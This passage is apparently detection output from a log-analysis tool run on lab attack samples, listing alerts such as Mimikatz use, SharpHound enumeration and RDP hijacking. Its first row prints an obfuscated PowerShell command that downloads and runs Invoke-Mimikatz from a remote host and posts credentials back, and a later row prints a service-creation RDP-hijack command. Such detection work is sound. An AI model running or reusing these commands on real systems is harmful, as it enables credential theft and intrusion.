Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@
107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | LID: 0x36df3b7 | PID: 4436 | PGUID: 9828DA72-683B-608C-A50C-000000000C00 | Hash: 
SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter 
Substring,,rules/sigma/process_creation/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-01 05:32:56.725 +09:00,win10-02.offsec.lan,4103,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx +2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx +2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups 
Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM sensitive domain users & groups discovery.evtx +2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: 
C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-03 21:07:07.639 +09:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx +2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx +2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: 
